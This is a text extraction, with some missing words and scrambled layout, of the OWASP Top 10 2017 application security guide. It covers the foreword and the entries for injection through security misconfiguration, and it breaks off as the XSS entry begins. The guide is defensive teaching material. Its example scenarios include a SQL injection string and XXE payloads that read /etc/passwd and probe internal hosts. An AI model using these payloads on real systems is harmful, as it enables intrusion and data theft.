This work is licensed under a

https://owasp.org Creative Commons Attribution-ShareAlike 4.0 International License


TOC - About OWASP
FW - Foreword
I-
RN -
Risk - Application Security Risks
T10 - OWASP Top 10 Application Security
Risks 2017
A1:2017 - Injection
A2:2017 - Broken Authentication
A3:2017 - Sensitive Data Exposure
A4:2017 - XML External Entities (XXE)
A5:2017 -
A6:2017 - Security Misconfiguration
A7:2017 - Cross-Site Scripting (XSS)
A8:2017 - Insecure Deserialization
A9:2017 - Using Components with Known
A10:2017 - Insufficient Logging & Monitoring
+D -
+T -
+O -
+A -
+R - Note About Risks
+RF - Details About Risk Factors
+DAT - Methodology and Data
+ACK - Acknowledgements
Copyright © 2003
This document is released under the Creative Commons Attribution Share-Alike 4.0 license.
For any reuse or distribution, you must make it clear to others the license terms of this work.
1
The Open Web Application Security Project (OWASP) is an
1 open community dedicated to enabling organizations to
2 develop, purchase, and maintain applications and APIs that
can be trusted.
3
At OWASP, you'll find free and open:
4
Application security tools and standards.
5 Complete books on application security testing, secure
code development, and secure code review.
Presentations and videos.
6 Cheat sheets on many common topics.
Standard security controls and libraries.
7 Local chapters worldwide.
8 Cutting edge research.
Extensive conferences worldwide.
9 Mailing lists.
10
Learn more at: https://www.owasp.org.
11
All OWASP tools, documents, videos, presentations, and
12 chapters are free and open to anyone interested in improving
application security.
.. 13
We advocate approaching application security as a people,
14
process, and technology problem, because the most
effective approaches to application security require
15 improvements in these areas.
16 OWASP is a new kind of organization. Our freedom from
commercial pressures allows us to provide unbiased,
17 practical, and cost-effective information about application
18 security.
19 OWASP is not affiliated with any technology company,
although we support the informed use of commercial security
20 technology. OWASP produces many types of materials in a
collaborative, transparent, and open way.
21
The OWASP Foundation is the non-profit entity that ensures
22
the project's long-term success. Almost everyone associated
23 with OWASP is a volunteer, including the OWASP board,
chapter leaders, project leaders, and project members.
24 We support innovative security research with grants and
infrastructure.
Come join us!
2017 The OWASP Foundation
 2

Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our software
becomes increasingly complex, and connected, the difficulty of achieving application security increases exponentially. The
rapid pace of modern software development processes makes the most common risks essential to discover and resolve
quickly and accurately. We can no longer afford to tolerate relatively simple security problems like those presented in this
OWASP Top 10.

A great deal of feedback was received during the creation of the OWASP Top 10 - 2017, more than for any other equivalent
OWASP effort. This shows how much passion the community has for the OWASP Top 10, and thus how critical it is for
OWASP to get the Top 10 right for the majority of use cases.

Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst developers and managers,
it has become the de facto application security standard.

In this release, issues and recommendations are written concisely and in a testable way to assist with the adoption of the
OWASP Top 10 in application security programs. We encourage large and high performing organizations to use the OWASP
Application Security Verification Standard (ASVS) if a true standard is required, but for most, the OWASP Top 10 is a great
start on the application security journey.

We have written up a range of suggested next steps for different users of the OWASP Top 10, including
Developers, , , which is suitable for CIOs and CISOs, and
, which is suitable for application managers or anyone responsible for the lifecycle of
the application.

In the long term, we encourage all software development teams and organizations to create an application security program
that is compatible with your culture and technology. These programs come in all shapes and sizes. Leverage your
organization's existing strengths to measure and improve your application security program using the Software Assurance
Maturity Model.

We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with
your questions, comments, and ideas at our GitHub project repository:

https://github.com/OWASP/Top10/issues

You can find the OWASP Top 10 project and translations here:

https://www.owasp.org/index.php/top10

Lastly, we wish to thank the founding leadership of the OWASP Top 10 project, Dave Wichers and Jeff Williams, for all their
efforts, and believing in us to get this finished with the community's help. Thank you!

Andrew van der Stock

Brian Glas
Neil Smithline
Torsten Gigler

Thanks to Autodesk for sponsoring the OWASP Top 10 - 2017.

Organizations and individuals that have provided vulnerability prevalence data or other assistance are listed on the
Acknowledgements page.
 3

This major update adds several new issues, including two issues selected by the community - A8:2017-Insecure
Deserialization and A10:2017-Insufficient Logging and Monitoring. Two key differentiators from previous OWASP Top 10
releases are the substantial community feedback and extensive data assembled from dozens of organizations, possibly the
largest amount of data ever assembled in the preparation of an application security standard. This provides us with
confidence that the new OWASP Top 10 addresses the most impactful application security risks currently facing
organizations.

The OWASP Top 10 - 2017 is based primarily on 40+ data submissions from firms that specialize in application security and
an industry survey that was completed by over 500 individuals. This data spans vulnerabilities gathered from hundreds of
organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to
this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.

A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the
consequences of the most common and most important web application security weaknesses. The Top 10 provides basic
techniques to protect against these high risk problem areas, and provides guidance on where to go from here.

Don't stop at 10. There are hundreds of issues that could
affect the overall security of a web application as discussed
in the OWASP Developer's Guide and the OWASP Cheat
Sheet Series. These are essential reading for anyone
developing web applications and APIs. Guidance on how to
effectively find vulnerabilities in web applications and APIs
is provided in the OWASP Testing Guide.
We'd like to thank the organizations that contributed their
vulnerability data to support the 2017 update. We received
more than 40 responses to the call for data. For the first
time, all the data contributed to a Top 10 release, and the full
list of contributors is publicly available. We believe this is one
of the larger, more diverse collections of vulnerability data
ever publicly collected.

Constant change. The OWASP Top 10 will continue to
change. Even without changing a single line of your
application's code, you may become vulnerable as new
flaws are discovered and attack methods are refined.
Please review the advice at the end of the Top 10 in What's
Next For Developers, Security Testers, Organizations, and
Application Managers for more information.
Think positive. When you're ready to stop chasing
vulnerabilities and focus on establishing strong application
security controls, the OWASP Proactive Controls project
provides a starting point to help developers build security
into their application and the OWASP Application Security
Verification Standard (ASVS) is a guide for organizations
and application reviewers on what to verify.
Use tools wisely. Security vulnerabilities can be quite
complex and deeply buried in code. In many cases, the
most cost-effective approach for finding and eliminating
these weaknesses is human experts armed with advanced
tools. Relying on tools alone provides a false sense of
security and is not recommended.
Push left, right, and everywhere. Focus on making
security an integral part of your culture throughout your
development organization. Find out more in the OWASP
Software Assurance Maturity Model (SAMM).
As there are more contributors than space here, we have
created a dedicated page to recognize the contributions
made. We wish to give heartfelt thanks to these
organizations for being willing to be on the front lines by
publicly sharing vulnerability data from their efforts. We hope
this will continue to grow and encourage more organizations
to do the same and possibly be seen as one of the key
milestones of evidence-based security. The OWASP Top 10
would not be possible without these amazing contributions.
A big thank you to the more than 500 individuals who took
the time to complete the industry ranked survey. Your voice
helped determine two new additions to the Top 10. The
additional comments, notes of encouragement,
and criticisms were all appreciated. We know your time is
valuable and we wanted to say thanks.
We would like to thank those individuals who have
contributed significant constructive comments and time
reviewing this update to the Top 10. As much as possible,
Acknowledgements
And finally, we'd like to thank in advance all the translators
out there who will translate this release of the Top 10 into
numerous different languages, helping to make the OWASP
Top 10 more accessible to the entire planet.
 4

Change has accelerated over the last four years, and the OWASP Top 10 needed to change. We've completely refactored the
OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, re-
written each risk from the ground up, and added references to frameworks and languages that are now commonly used.
Over the last few years, the fundamental technology and architecture of applications has changed significantly:
Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. Microservices come with their
own security challenges including establishing trust between microservices, containers, secret management, etc. Old code never
expected to be accessible from the Internet is now sitting behind an API or RESTful web service to be consumed by Single Page
Applications (SPAs) and mobile applications. Architectural assumptions by the code, such as trusted callers, are no longer valid.
Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular
feature-rich front ends. Client-side functionality that has traditionally been delivered server-side brings its own security challenges.
JavaScript is now the primary language of the web with node.js running server side and modern web frameworks such as
Bootstrap, Electron, Angular, and React running on the client.
New issues, supported by data:
A4:2017-XML External Entities (XXE) is a new category primarily supported by source code analysis security testing tools
(SAST) data sets.
New issues, supported by the community:
We asked the community to provide insight into two forward looking weakness categories. After over 500 peer submissions, and
removing issues that were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are:
A8:2017-Insecure Deserialization, which permits remote code execution or sensitive object manipulation on affected platforms.
A10:2017-Insufficient Logging and Monitoring, the lack of which can prevent or significantly delay malicious activity and breach
detection, incident response, and digital forensics.
Merged or retired, but not forgotten:
A4-Insecure Direct Object References and A7-Missing Function Level Access Control merged into A5:2017-Broken Access
Control.
A8-Cross-Site Request Forgery (CSRF), as many frameworks include CSRF defenses, it was found in only 5% of applications.
A10-Unvalidated Redirects and Forwards, while found in approximately 8% of applications, it was edged out overall by XXE.

A1 Injection A1:2017-Injection

A2 Broken Authentication and Session Management A2:2017-Broken Authentication

A3 Cross-Site Scripting (XSS) A3:2017-Sensitive Data Exposure

A5 Security Misconfiguration

A6 Sensitive Data Exposure A6:2017-Security Misconfiguration

A7:2017-Cross-Site Scripting (XSS)

A8 Cross-Site Request Forgery (CSRF)

A9 Using Components with Known Vulnerabilities A9:2017-Using Components with Known Vulnerabilities

A10 Unvalidated Redirects and Forwards

 5

Attackers can potentially use many different paths through your application to do harm to your business or organization. Each
of these paths represents a risk that may, or may not, be serious enough to warrant attention.

Threat Attack Security Technical Business

Agents Vectors Controls Impacts Impacts

Sometimes these paths are trivial to find and exploit, and sometimes they are extremely difficult. Similarly, the harm that is
caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can
evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an
estimate of the technical and business impact to your organization. Together, these factors determine your overall risk.

The OWASP Top 10 focuses on identifying the most serious web application OWASP
security risks for a broad array of organizations. For each of these risks, we
provide generic information about likelihood and technical impact using the OWASP Risk Rating Methodology
following simple ratings scheme, which is based on the OWASP Risk Rating Article on Threat/Risk Modeling
Methodology.

Threat Weakness Weakness Technical Business

External
Exploitability
Agents Prevalence Detectability Impacts Impacts ISO 31000: Risk Management Std
ISO 27001: ISMS
Easy: 3 Widespread: 3 Easy: 3 Severe: 3
Appli- NIST Cyber Framework (US)
Business
cation Average: 2 Common: 2 Average: 2 Moderate: 2 ASD Strategic Mitigations (AU)
Specific
Specific NIST CVSS 3.0
Difficult: 1 Uncommon: 1 Difficult: 1 Minor: 1
Microsoft Threat Modelling Tool
In this edition, we have updated the risk rating system to assist in calculating the
likelihood and impact of any given risk. For more details, please see Note About
Risks.
Each organization is unique, and so are the threat actors for that organization,
their goals, and the impact of any breach. If a public interest organization uses a
content management system (CMS) for public information and a health system
uses that same exact CMS for sensitive health records, the threat actors and
business impacts can be very different for the same software. It is critical to
understand the risk to your organization based on applicable threat agents and
business impacts.
Where possible, the names of the risks in the Top 10 are aligned with Common
Weakness Enumeration (CWE) weaknesses to promote generally accepted
naming conventions and to reduce confusion.
6
 7

Threat
Agents

App. Specific Exploitability: 3 Prevalence: 2 Detectability: 3 Technical: 3 Business ?

Almost any source of data can be an
injection vector, environment
variables, parameters, external and
internal web services, and all types of
users. Injection flaws occur when an
attacker can send hostile data to an
interpreter.
Injection flaws are very prevalent, particularly in
legacy code. Injection vulnerabilities are often found
in SQL, LDAP, XPath, or NoSQL queries, OS
commands, XML parsers, SMTP headers,
expression languages, and ORM queries.
Injection flaws are easy to discover when examining
code. Scanners and fuzzers can help attackers find
injection flaws.
Injection can result in data loss,
corruption, or disclosure to
unauthorized parties, loss of
accountability, or denial of access.
Injection can sometimes lead to
complete host takeover.
The business impact depends on the
needs of the application and data.

An application is vulnerable to attack when:
User-supplied data is not validated, filtered, or sanitized by the
application.
Dynamic queries or non-parameterized calls without context-
aware escaping are used directly in the interpreter.
Hostile data is used within object-relational mapping (ORM)
search parameters to extract additional, sensitive records.
Hostile data is directly used or concatenated, such that the
SQL or command contains both structure and hostile data in
dynamic queries, commands, or stored procedures.
Some of the more common injections are SQL, NoSQL, OS
command, Object Relational Mapping (ORM), LDAP, and
Expression Language (EL) or Object Graph Navigation Library
(OGNL) injection. The concept is identical among all interpreters.
Source code review is the best method of detecting if
applications are vulnerable to injections, closely followed by
thorough automated testing of all parameters, headers, URL,
cookies, JSON, SOAP, and XML data inputs. Organizations can
include static source (SAST) and dynamic application test
(DAST) tools into the CI/CD pipeline to identify newly introduced
injection flaws prior to production deployment.
Preventing injection requires keeping data separate from
commands and queries.
The preferred option is to use a safe API, which avoids the use
of the interpreter entirely or provides a parameterized interface,
or migrate to use Object Relational Mapping Tools (ORMs).
Note: Even when parameterized, stored procedures can still
introduce SQL injection if PL/SQL or T-SQL concatenates
queries and data, or executes hostile data with EXECUTE
IMMEDIATE or exec().
Use positive or "whitelist" server-side input validation. This is
not a complete defense as many applications require special
characters, such as text areas or APIs for mobile applications.
For any residual dynamic queries, escape special characters
using the specific escape syntax for that interpreter.
Note: SQL structure such as table names, column names, and
so on cannot be escaped, and thus user-supplied structure
names are dangerous. This is a common issue in report-writing
software.
Use LIMIT and other SQL controls within queries to prevent
mass disclosure of records in case of SQL injection.

Scenario #1: An application uses untrusted data in the

construction of the following vulnerable SQL call:
String query = "SELECT * FROM accounts WHERE
custID='" + request.getParameter("id") + "'";
Scenario #2
may result in queries that are still vulnerable, (e.g. Hibernate
Query Language (HQL)):
Query HQLQuery = session.createQuery("FROM accounts
WHERE custID='" + request.getParameter("id") + "'");
their browser to send: ' or '1'='1. For example:
http://example.com/app/accountView?id=' or '1'='1
This changes the meaning of both queries to return all the
records from the accounts table. More dangerous attacks could
modify or delete data, or even invoke stored procedures.
OWASP Proactive Controls: Parameterize Queries
OWASP ASVS: V5 Input Validation and Encoding
OWASP Testing Guide: SQL Injection, Command Injection,
ORM injection
OWASP Cheat Sheet: Injection Prevention
OWASP Cheat Sheet: SQL Injection Prevention
OWASP Cheat Sheet: Injection Prevention in Java
OWASP Cheat Sheet: Query Parameterization
OWASP Automated Threats to Web Applications OAT-014
CWE-77: Command Injection
CWE-89: SQL Injection
CWE-564: Hibernate Injection
CWE-917: Expression Language Injection
PortSwigger: Server-side template injection
 8

Threat
Agents

App. Specific Exploitability: 3 Prevalence: 2 Detectability: 2 Technical: 3 Business ?

Attackers have access to hundreds of
millions of valid username and
password combinations for credential
stuffing, default administrative
account lists, automated brute force,
and dictionary attack tools. Session
management attacks are well
understood, particularly in relation to
unexpired session tokens.
The prevalence of broken authentication is
widespread due to the design and implementation of
most identity and access controls. Session manage-
ment is the bedrock of authentication and access
controls, and is present in all stateful applications.
Attackers can detect broken authentication using
manual means and exploit them using automated
tools with password lists and dictionary attacks.
Attackers have to gain access to only
a few accounts, or just one admin
account to compromise the system.
Depending on the domain of the
application, this may allow money
laundering, social security fraud, and
identity theft, or disclose legally
protected highly sensitive information.

Confirmation of the user's identity, authentication, and session
management are critical to protect against authentication-related
attacks.
There may be authentication weaknesses if the application:
Permits automated attacks such as credential stuffing, where
the attacker has a list of valid usernames and passwords.
Permits brute force or other automated attacks.
Permits default, weak, or well-known passwords, such as
Uses weak or ineffective credential recovery and forgot-
password processes, such as "knowledge-based answers",
which cannot be made safe.
Uses plain text, encrypted, or weakly hashed passwords (see
A3:2017-Sensitive Data Exposure).
Has missing or ineffective multi-factor authentication.
Exposes Session IDs in the URL (e.g., URL rewriting).
Does not rotate Session IDs after successful login.
Does not properly invalidate Session IDs. User sessions or
authentication tokens (particularly single sign-on (SSO) tokens)
Where possible, implement multi-factor authentication to
prevent automated, credential stuffing, brute force, and stolen
credential re-use attacks.
Do not ship or deploy with any default credentials, particularly
for admin users.
Implement weak-password checks, such as testing new or
changed passwords against a list of the top 10000 worst
passwords.
Align password length, complexity and rotation policies with
NIST 800-63 B's guidelines in section 5.1.1 for Memorized
Secrets or other modern, evidence based password policies.
Ensure registration, credential recovery, and API pathways are
hardened against account enumeration attacks by using the
same messages for all outcomes.
Limit or increasingly delay failed login attempts. Log all failures
and alert administrators when credential stuffing, brute force, or
other attacks are detected.
Use a server-side, secure, built-in session manager that
generates a new random session ID with high entropy after
login. Session IDs should not be in the URL, be securely stored
and invalidated after logout, idle, and absolute timeouts.

Scenario #1: Credential stuffing, the use of lists of known

passwords, is a common attack. If an application does not OWASP Proactive Controls: Implement Identity and
implement automated threat or credential stuffing protections, the Authentication Controls
application can be used as a password oracle to determine if the
OWASP ASVS: V2 Authentication, V3 Session Management
credentials are valid.
OWASP Testing Guide: Identity, Authentication
Scenario #2: Most authentication attacks occur due to the
continued use of passwords as a sole factor. Once considered OWASP Cheat Sheet: Authentication
best practices, password rotation and complexity requirements OWASP Cheat Sheet: Credential Stuffing
are viewed as encouraging users to use, and reuse, weak OWASP Cheat Sheet: Forgot Password
passwords. Organizations are recommended to stop these OWASP Cheat Sheet: Session Management
practices per NIST 800-63 and use multi-factor authentication. OWASP Automated Threats Handbook
Scenario #3
user uses a public computer to access an application. Instead of
NIST 800-63b: 5.1.1 Memorized Secrets
walks away. An attacker uses the same browser an hour later, CWE-287: Improper Authentication
and the user is still authenticated. CWE-384: Session Fixation
 9

Threat
Agents

App. Specific Exploitability: 2 Prevalence: 3 Detectability: 2 Technical: 3 Business ?

Rather than directly attacking crypto,
attackers steal keys, execute man-in-
the-middle attacks, or steal clear text
data off the server, while in transit, or
manual attack is generally required.
Previously retrieved password
databases could be brute forced by
Graphics Processing Units (GPUs).
Over the last few years, this has been the most
common impactful attack. The most common flaw is
simply not encrypting sensitive data. When crypto is
employed, weak key generation and management,
and weak algorithm, protocol and cipher usage is
common, particularly for weak password hashing
storage techniques. For data in transit, server side
weaknesses are mainly easy to detect, but hard for
data at rest.
Failure frequently compromises all
data that should have been protected.
Typically, this information includes
sensitive personal information (PII)
data such as health records, creden-
tials, personal data, and credit cards,
which often require protection as
defined by laws or regulations such as
the EU GDPR or local privacy laws.

The first thing is to determine the protection needs of data in
transit and at rest. For example, passwords, credit card numbers,
health records, personal information and business secrets
require extra protection, particularly if that data falls under
privacy laws, e.g. EU's General Data Protection Regulation
(GDPR), or regulations, e.g. financial data protection such as
PCI Data Security Standard (PCI DSS). For all such data:
Is any data transmitted in clear text? This concerns protocols
such as HTTP, SMTP, and FTP. External internet traffic is
especially dangerous. Verify all internal traffic e.g. between
load balancers, web servers, or back-end systems.
Is sensitive data stored in clear text, including backups?
Are any old or weak cryptographic algorithms used either by
default or in older code?
Are default crypto keys in use, weak crypto keys generated or
re-used, or is proper key management or rotation missing?
Is encryption not enforced, e.g. are any user agent (browser)
security directives or headers missing?
Does the user agent (e.g. app, mail client) not verify if the
received server certificate is valid?
See ASVS Crypto (V7), Data Prot (V9) and SSL/TLS (V10)
Do the following, at a minimum, and consult the references:
Classify data processed, stored, or transmitted by an
application. Identify which data is sensitive according to privacy
laws, regulatory requirements, or business needs.
Apply controls as per the classification.
Discard it as soon as
possible or use PCI DSS compliant tokenization or even
truncation. Data that is not retained cannot be stolen.
Make sure to encrypt all sensitive data at rest.
Ensure up-to-date and strong standard algorithms, protocols,
and keys are in place; use proper key management.
Encrypt all data in transit with secure protocols such as TLS
with perfect forward secrecy (PFS) ciphers, cipher prioritization
by the server, and secure parameters. Enforce encryption
using directives like HTTP Strict Transport Security (HSTS).
Disable caching for responses that contain sensitive data.
Store passwords using strong adaptive and salted hashing
functions with a work factor (delay factor), such as Argon2,
scrypt, bcrypt, or PBKDF2.
Verify independently the effectiveness of configuration and
settings.

Scenario #1: An application encrypts credit card numbers in a

database using automatic database encryption. However, this
data is automatically decrypted when retrieved, allowing an SQL
injection flaw to retrieve credit card numbers in clear text.
Scenario #2: A site doesn't use or enforce TLS for all pages or
supports weak encryption. An attacker monitors network traffic
(e.g. at an insecure wireless network), downgrades connections
from HTTPS to HTTP, intercepts requests, and steals the user's
session cookie. The attacker then replays this cookie and hijacks
the user's (authenticated) session, accessing or modifying the
user's private data. Instead of the above they could alter all
transported data, e.g. the recipient of a money transfer.
Scenario #3: The password database uses unsalted or simple
hashes to store everyone's passwords. A file upload flaw allows
an attacker to retrieve the password database. All the unsalted
hashes can be exposed with a rainbow table of pre-calculated
hashes. Hashes generated by simple or fast hash functions may
be cracked by GPUs, even if they were salted.
OWASP Proactive Controls: Protect Data
OWASP Application Security Verification Standard (V7,9,10)
OWASP Cheat Sheet: Transport Layer Protection
OWASP Cheat Sheet: User Privacy Protection
OWASP Cheat Sheets: Password and Cryptographic Storage
OWASP Security Headers Project; Cheat Sheet: HSTS
OWASP Testing Guide: Testing for weak cryptography
CWE-220: Exposure of sens. information through data queries
CWE-310: Cryptographic Issues; CWE-311: Missing Encryption
CWE-312: Cleartext Storage of Sensitive Information
CWE-319: Cleartext Transmission of Sensitive Information
CWE-326: Weak Encryption; CWE-327: Broken/Risky Crypto
CWE-359: Exposure of Private Information (Privacy Violation)
 10

Threat
Agents

App. Specific Exploitability: 2 Prevalence: 2 Detectability: 3 Technical: 3 Business ?

Attackers can exploit vulnerable XML
processors if they can upload XML or
include hostile content in an XML
document, exploiting vulnerable code,
dependencies or integrations.
By default, many older XML processors allow
specification of an external entity, a URI that is
dereferenced and evaluated during XML processing.
SAST tools can discover this issue by inspecting
dependencies and configuration. DAST tools require
additional manual steps to detect and exploit this
issue. Manual testers need to be trained in how to
test for XXE, as it not commonly tested as of 2017.
These flaws can be used to extract
data, execute a remote request from
the server, scan internal systems,
perform a denial-of-service attack, as
well as execute other attacks.
The business impact depends on the
protection needs of all affected
application and data.

Applications and in particular XML-based web services or
downstream integrations might be vulnerable to attack if:
The application accepts XML directly or XML uploads,
especially from untrusted sources, or inserts untrusted data into
XML documents, which is then parsed by an XML processor.
Any of the XML processors in the application or SOAP based
web services has document type definitions (DTDs) enabled.
As the exact mechanism for disabling DTD processing varies
by processor, it is good practice to consult a reference such as
the . 'XXE Prevention'.
If your application uses SAML for identity processing within
federated security or single sign on (SSO) purposes. SAML
uses XML for identity assertions, and may be vulnerable.
If the application uses SOAP prior to version 1.2, it is likely
susceptible to XXE attacks if XML entities are being passed to
the SOAP framework.
Being vulnerable to XXE attacks likely means that the
application is vulnerable to denial of service attacks including
the Billion Laughs attack.
Developer training is essential to identify and mitigate XXE.
Besides that, preventing XXE requires:
Whenever possible, use less complex data formats such as
JSON, and avoiding serialization of sensitive data.
Patch or upgrade all XML processors and libraries in use by
the application or on the underlying operating system. Use
dependency checkers. Update SOAP to SOAP 1.2 or higher.
Disable XML external entity and DTD processing in all XML
parsers in the application, as per the OWASP Cheat Sheet
Implement positive ("whitelisting") server-side input validation,
filtering, or sanitization to prevent hostile data within XML
documents, headers, or nodes.
Verify that XML or XSL file upload functionality validates
incoming XML using XSD validation or similar.
SAST tools can help detect XXE in source code, although
manual code review is the best alternative in large, complex
applications with many integrations.
If these controls are not possible, consider using virtual
patching, API security gateways, or Web Application Firewalls
(WAFs) to detect, monitor, and block XXE attacks.

Numerous public XXE issues have been discovered, including

attacking embedded devices. XXE occurs in a lot of unexpected
OWASP Application Security Verification Standard
places, including deeply nested dependencies. The easiest way
OWASP Testing Guide: Testing for XML Injection
is to upload a malicious XML file, if accepted:
OWASP XXE Vulnerability
Scenario #1: The attacker attempts to extract data from the
server: OWASP Cheat Sheet: XXE Prevention
<?xml version="1.0" encoding="ISO-8859-1"?> OWASP Cheat Sheet: XML Security
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo> CWE-611: Improper Restriction of XXE
Billion Laughs Attack
Scenario #2: An attacker probes the server's private network by
changing the above ENTITY line to: SAML Security XML External Entity Attack
<!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]> Detecting and exploiting XXE in SAML Interfaces
Scenario #3: An attacker attempts a denial-of-service attack by
including a potentially endless file:
<!ENTITY xxe SYSTEM "file:///dev/random" >]>
 11

Threat
Agents

App. Specific Exploitability: 2 Prevalence: 2 Detectability: 2 Technical: 3 Business ?

Exploitation of access control is a
core skill of attackers. SAST and
DAST tools can detect the absence of
access control but cannot verify if it is
functional when it is present. Access
control is detectable using manual
means, or possibly through
automation for the absence of access
controls in certain frameworks.
Access control weaknesses are common due to the
lack of automated detection, and lack of effective
functional testing by application developers.
Access control detection is not typically amenable to
automated static or dynamic testing. Manual testing
is the best way to detect missing or ineffective
access control, including HTTP method (GET vs
PUT, etc), controller, direct object references, etc.
The technical impact is attackers
acting as users or administrators, or
users using privileged functions, or
creating, accessing, updating or
deleting every record.
The business impact depends on the
protection needs of the application
and data.

Access control enforces policy such that users cannot act
outside of their intended permissions. Failures typically lead to
unauthorized information disclosure, modification or destruction
of all data, or performing a business function outside of the limits
of the user. Common access control vulnerabilities include:
Bypassing access control checks by modifying the URL,
internal application state, or the HTML page, or simply using a
custom API attack tool.
Allowing the primary key to be changed to another users
record, permitting viewing or editing someone else's account.
Elevation of privilege. Acting as a user without being logged in,
or acting as an admin when logged in as a user.
Metadata manipulation, such as replaying or tampering with a
JSON Web Token (JWT) access control token or a cookie or
hidden field manipulated to elevate privileges, or abusing JWT
invalidation
CORS misconfiguration allows unauthorized API access.
Force browsing to authenticated pages as an unauthenticated
user or to privileged pages as a standard user. Accessing API
with missing access controls for POST, PUT and DELETE.
Access control is only effective if enforced in trusted server-side
code or server-less API, where the attacker cannot modify the
access control check or metadata.
With the exception of public resources, deny by default.
Implement access control mechanisms once and re-use them
throughout the application, including minimizing CORS usage.
Model access controls should enforce record ownership, rather
than accepting that the user can create, read, update, or delete
any record.
Unique application business limit requirements should be
enforced by domain models.
Disable web server directory listing and ensure file metadata
(e.g. .git) and backup files are not present within web roots.
Log access control failures, alert admins when appropriate
(e.g. repeated failures).
Rate limit API and controller access to minimize the harm from
automated attack tooling.
JWT tokens should be invalidated on the server after logout.
Developers and QA staff should include functional access control
unit and integration tests.

Scenario #1: The application uses unverified data in a SQL call

that is accessing account information:
pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery( );
An attacker simply modifies the 'acct' parameter in the browser to
send whatever account number they want. If not properly
verified, the attacker can access any user's account.
http://example.com/app/accountInfo?acct=notmyacct
Scenario #2: An attacker simply force browses to target URLs.
Admin rights are required for access to the admin page.
http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo
non-admin can access the admin page, this is a flaw.
OWASP Proactive Controls: Access Controls
OWASP Application Security Verification Standard: V4 Access
Control
OWASP Testing Guide: Authorization Testing
OWASP Cheat Sheet: Access Control
CWE-22: Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal')
CWE-284: Improper Access Control (Authorization)
CWE-285: Improper Authorization
CWE-639: Authorization Bypass Through User-Controlled Key
PortSwigger: Exploiting CORS Misconfiguration
 12

Threat
Agents

App. Specific Exploitability: 3 Prevalence: 3 Detectability: 3 Technical: 2 Business ?

Attackers will often attempt to exploit
unpatched flaws or access default
accounts, unused pages, unprotected
files and directories, etc to gain
unauthorized access or knowledge of
the system.
Security misconfiguration can happen at any level of
an application stack, including the network services,
platform, web server, application server, database,
frameworks, custom code, and pre-installed virtual
machines, containers, or storage. Automated
scanners are useful for detecting misconfigurations,
use of default accounts or configurations,
unnecessary services, legacy options, etc.
Such flaws frequently give attackers
unauthorized access to some system
data or functionality. Occasionally,
such flaws result in a complete
system compromise.
The business impact depends on the
protection needs of the application
and data.

The application might be vulnerable if the application is:
Missing appropriate security hardening across any part of the
application stack, or improperly configured permissions on
cloud services.
Unnecessary features are enabled or installed (e.g.
unnecessary ports, services, pages, accounts, or privileges).
Default accounts and their passwords still enabled and
unchanged.
Error handling reveals stack traces or other overly informative
error messages to users.
For upgraded systems, latest security features are disabled or
not configured securely.
The security settings in the application servers, application
frameworks (e.g. Struts, Spring, ASP.NET), libraries,
databases, etc. not set to secure values.
The server does not send security headers or directives or they
are not set to secure values.
The software is out of date or vulnerable (see A9:2017-Using
Components with Known Vulnerabilities).
Without a concerted, repeatable application security
configuration process, systems are at a higher risk.
Secure installation processes should be implemented, including:
A repeatable hardening process that makes it fast and easy to
deploy another environment that is properly locked down.
Development, QA, and production environments should all be
configured identically, with different credentials used in each
environment. This process should be automated to minimize
the effort required to setup a new secure environment.
A minimal platform without any unnecessary features,
components, documentation, and samples. Remove or do not
install unused features and frameworks.
A task to review and update the configurations appropriate to
all security notes, updates and patches as part of the patch
management process (see A9:2017-Using Components with
Known Vulnerabilities). In particular, review cloud storage
permissions (e.g. S3 bucket permissions).
A segmented application architecture that provides effective,
secure separation between components or tenants, with
segmentation, containerization, or cloud security groups.
Sending security directives to clients, e.g. Security Headers.
An automated process to verify the effectiveness of the
configurations and settings in all environments.

Scenario #1: The application server comes with sample

applications that are not removed from the production server.
These sample applications have known security flaws attackers
use to compromise the server. If one of these applications is the
attacker logs in with default passwords and takes over.
Scenario #2: Directory listing is not disabled on the server. An
attacker discovers they can simply list directories. The attacker
finds and downloads the compiled Java classes, which they
decompile and reverse engineer to view the code. The attacker
then finds a serious access control flaw in the application.
Scenario #3 de-
tailed error messages, e.g. stack traces, to be returned to users.
This potentially exposes sensitive information or underlying flaws
such as component versions that are known to be vulnerable.
Scenario #4: A cloud service provider has default sharing
permissions open to the Internet by other CSP users. This allows
sensitive data stored within cloud storage to be accessed.
OWASP Testing Guide: Configuration Management
OWASP Testing Guide: Testing for Error Codes
OWASP Security Headers Project
For additional requirements in this area, see the Application
Security Verification Standard V19 Configuration.
NIST Guide to General Server Hardening
CWE-2: Environmental Security Flaws
CWE-16: Configuration
CWE-388: Error Handling
CIS Security Configuration Guides/Benchmarks
Amazon S3 Bucket Discovery and Enumeration
 13

Threat
Agents

App. Specific Exploitability: 3 Prevalence: 3 Detectability: 3 Technical: 2 Business ?

Automated tools can detect and
exploit all three forms of XSS, and
there are freely available exploitation
frameworks.
XSS is the second most prevalent issue in the
OWASP Top 10, and is found in around two-thirds of
all applications.
Automated tools can find some XSS problems
automatically, particularly in mature technologies
such as PHP, J2EE / JSP, and ASP.NET.
The impact of XSS is moderate for
reflected and DOM XSS, and severe
for stored XSS, with remote code
execution on the victim's browser,
such as stealing credentials,
sessions, or delivering malware to the
victim.

There are three forms of XSS, usually targeting users' browsers:
